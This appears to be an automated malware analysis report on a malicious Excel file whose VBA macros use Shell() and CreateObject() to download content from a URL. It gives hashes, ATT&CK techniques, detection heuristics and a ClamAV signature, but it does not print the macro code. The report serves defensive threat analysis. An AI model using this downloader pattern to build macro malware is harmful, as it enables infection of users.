Office (OLE) / .XLS malware analysis — malicious · 1103596901ca7b85

MALICIOUS

Office (OLE) / .XLS

74.0 KB Created: 2022-11-29 07:16:03 Authoring application: Microsoft Excel First seen: 2022-11-30

MD5: c3329de25195c20272d188a7ef3790f0 SHA-1: b60879c4156c4794a09e8dc464b4b756a045121c SHA-256: 1103596901ca7b8503927fc2ca99dc9132a58c686da26aca030480b2584b638f

188 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1105 Ingress Tool Transfer

The file contains VBA macros that utilize the Shell() function and CreateObject() to download content from a URL. The HTML_PDF function attempts to fetch data from the provided URL, and the trombetta function processes this data. The presence of Shell() and CreateObject() calls, along with the downloader pattern, strongly suggests malicious intent. The ClamAV detection further supports this assessment.

Heuristics 5

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
ClamAV: Xls.Downloader.b83ac4c497e169b5-9980307-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Downloader.b83ac4c497e169b5-9980307-0
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas` `eb48ca61505819a4d99cc693d2dd3c25fbe1407842f37a3b8b364fd8c22ae10c`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5069 bytes

Open this report in the interactive analyzer, or submit your own file for analysis.